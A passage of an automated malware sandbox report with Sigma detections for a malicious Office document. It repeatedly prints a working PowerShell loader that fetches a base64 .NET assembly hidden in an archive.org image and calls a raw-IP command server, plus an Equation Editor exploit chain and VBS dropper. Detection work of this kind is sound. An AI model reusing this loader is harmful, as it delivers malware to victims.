                • 0x64be4:$str_b19: Unable to delete:
                • 0x65648:$str_b20: while fso.FileExists("
                • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                Click to see the 19 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.235.137.223, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3420, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3420, TargetFilename: C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3420, Protocol: tcp, SourceIp: 185.235.137.223, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0?
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3420, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , ProcessId: 3580, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3420, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , ProcessId: 3580, ProcessName: wscript.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0?
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = 